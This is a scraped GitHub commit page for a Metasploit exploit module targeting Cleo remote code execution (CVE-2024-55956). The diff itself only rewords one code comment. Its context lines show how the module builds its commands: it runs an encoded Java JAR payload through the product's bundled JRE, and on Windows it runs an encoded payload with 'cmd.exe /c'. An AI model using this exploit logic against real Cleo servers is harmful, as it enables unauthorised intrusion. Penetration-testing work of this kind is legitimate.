We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 0df004c commit 4379245Copy full SHA for 4379245
modules/exploits/multi/http/cleo_rce_cve_2024_55956.rb
@@ -118,7 +118,7 @@ def exploit
118
119
jar_file = payload.encoded_jar(random: true)
120
121
- # The product ships its own JRE, so we can use this relative path to run a Java JAR file.
+ # The product ships its own JRE, so we can use a relative path to run our Java JAR file.
122
command = "jre/bin/java -jar \"#{jar_path}\""
123
elsif target['Platform'] == 'win'
124
command = "cmd.exe /c \"#{payload.encoded}\""
0 commit comments